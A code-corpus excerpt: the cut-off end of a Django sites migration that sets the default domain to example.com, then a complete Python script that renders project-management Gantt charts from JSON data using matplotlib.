Site.objects.filter(pk=settings.SITE_ID).update(domain='example.com', name='example.com')
class Migration(migrations.Migration):
dependencies = [
# This is the final sites app migration
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_default_site, rollback_default_site),
]
|
the-stack_106_15946
|
#!/usr/bin/env python
# pylint: disable=R0902, R0903, C0103
"""
Gantt.py is a simple class to render Gantt charts, as commonly used in project management.
"""
import os
import json
import platform
from operator import sub
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
# TeX support: on Linux assume TeX in /usr/bin, on OSX check for texlive
if (platform.system() == 'Darwin') and 'tex' in os.getenv("PATH"):
LATEX = True
elif (platform.system() == 'Linux') and os.path.isfile('/usr/bin/latex'):
LATEX = True
else:
LATEX = False
# setup pyplot w/ tex support
if LATEX:
rc('text', usetex=True)
class Package():
"""Encapsulation of a work package
A work package is instantiated from a dictionary. It **has to have**
    a label, a start and an end. Optionally it may contain milestones
and a color
:arg str pkg: dictionary w/ package data name
"""
def __init__(self, pkg):
DEFCOLOR = "#32AEE0"
self.label = pkg['label']
self.start = pkg['start']
self.end = pkg['end']
if self.start < 0 or self.end < 0:
raise ValueError("Package cannot begin at t < 0")
if self.start > self.end:
raise ValueError("Cannot end before started")
try:
self.milestones = pkg['milestones']
except KeyError:
pass
try:
self.color = pkg['color']
except KeyError:
self.color = DEFCOLOR
try:
self.legend = pkg['legend']
except KeyError:
self.legend = None
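# Illustrative package definition (keys follow the Package docstring; values are made up):
#   pkg = Package({'label': 'WP1', 'start': 0, 'end': 3,
#                  'milestones': [2], 'color': '#32AEE0', 'legend': 'Phase 1'})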
class Gantt():
"""Gantt
Class to render a simple Gantt chart, with optional milestones
"""
def __init__(self, dataFile):
""" Instantiation
Create a new Gantt using the data in the file provided
or the sample data that came along with the script
:arg str dataFile: file holding Gantt data
"""
self.dataFile = dataFile
# some lists needed
self.packages = []
self.labels = []
self._loadData()
self._procData()
def _loadData(self):
""" Load data from a JSON file that has to have the keys:
packages & title. Packages is an array of objects with
            a label, start and end property and optional milestones
and color specs.
"""
# load data
with open(self.dataFile) as fh:
data = json.load(fh)
# must-haves
self.title = data['title']
for pkg in data['packages']:
self.packages.append(Package(pkg))
self.labels = [pkg['label'] for pkg in data['packages']]
# optionals
self.milestones = {}
for pkg in self.packages:
try:
self.milestones[pkg.label] = pkg.milestones
except AttributeError:
pass
try:
self.xlabel = data['xlabel']
except KeyError:
self.xlabel = ""
try:
self.xticks = data['xticks']
except KeyError:
self.xticks = ""
def _procData(self):
""" Process data to have all values needed for plotting
"""
# parameters for bars
self.nPackages = len(self.labels)
self.start = [None] * self.nPackages
self.end = [None] * self.nPackages
for pkg in self.packages:
idx = self.labels.index(pkg.label)
self.start[idx] = pkg.start
self.end[idx] = pkg.end
        self.durations = list(map(sub, self.end, self.start))
self.yPos = np.arange(self.nPackages, 0, -1)
def format(self):
""" Format various aspect of the plot, such as labels,ticks, BBox
:todo: Refactor to use a settings object
"""
# format axis
        plt.tick_params(
            axis='both',    # format x and y
            which='both',   # major and minor ticks affected
            bottom=True,    # bottom edge ticks are on
            top=False,      # top, left and right edge ticks are off
            left=False,
            right=False)
# tighten axis but give a little room from bar height
plt.xlim(0, max(self.end))
plt.ylim(0.5, self.nPackages + .5)
# add title and package names
plt.yticks(self.yPos, self.labels)
plt.title(self.title)
if self.xlabel:
plt.xlabel(self.xlabel)
if self.xticks:
plt.xticks(self.xticks, map(str, self.xticks))
def add_milestones(self):
"""Add milestones to GANTT chart.
The milestones are simple yellow diamonds
"""
if not self.milestones:
return
x = []
y = []
for key in self.milestones.keys():
for value in self.milestones[key]:
y += [self.yPos[self.labels.index(key)]]
x += [value]
plt.scatter(x, y, s=50, marker="^",
color="red", edgecolor="black", zorder=3)
def add_legend(self):
"""Add a legend to the plot iff there are legend entries in
the package definitions
"""
cnt = 0
for pkg in self.packages:
if pkg.legend:
cnt += 1
idx = self.labels.index(pkg.label)
self.barlist[idx].set_label(pkg.legend)
if cnt > 0:
self.legend = self.ax.legend(
shadow=False, ncol=3, fontsize="medium")
def render(self):
""" Prepare data for plotting
"""
# init figure
self.fig, self.ax = plt.subplots()
self.ax.yaxis.grid(False)
self.ax.xaxis.grid(True)
# assemble colors
colors = []
for pkg in self.packages:
colors.append(pkg.color)
self.barlist = plt.barh(self.yPos, list(self.durations),
left=self.start,
align='center',
height=.5,
alpha=1,
color=colors)
# format plot
self.format()
self.add_milestones()
self.add_legend()
@staticmethod
def show():
""" Show the plot
"""
plt.show()
@staticmethod
def save(saveFile='img/GANTT.png'):
""" Save the plot to a file. It defaults to `img/GANTT.png`.
:arg str saveFile: file to save to
"""
plt.savefig(saveFile, bbox_inches='tight')
if __name__ == '__main__':
g = Gantt('sample.json')
g.render()
g.show()
# g.save('img/GANTT.png')
|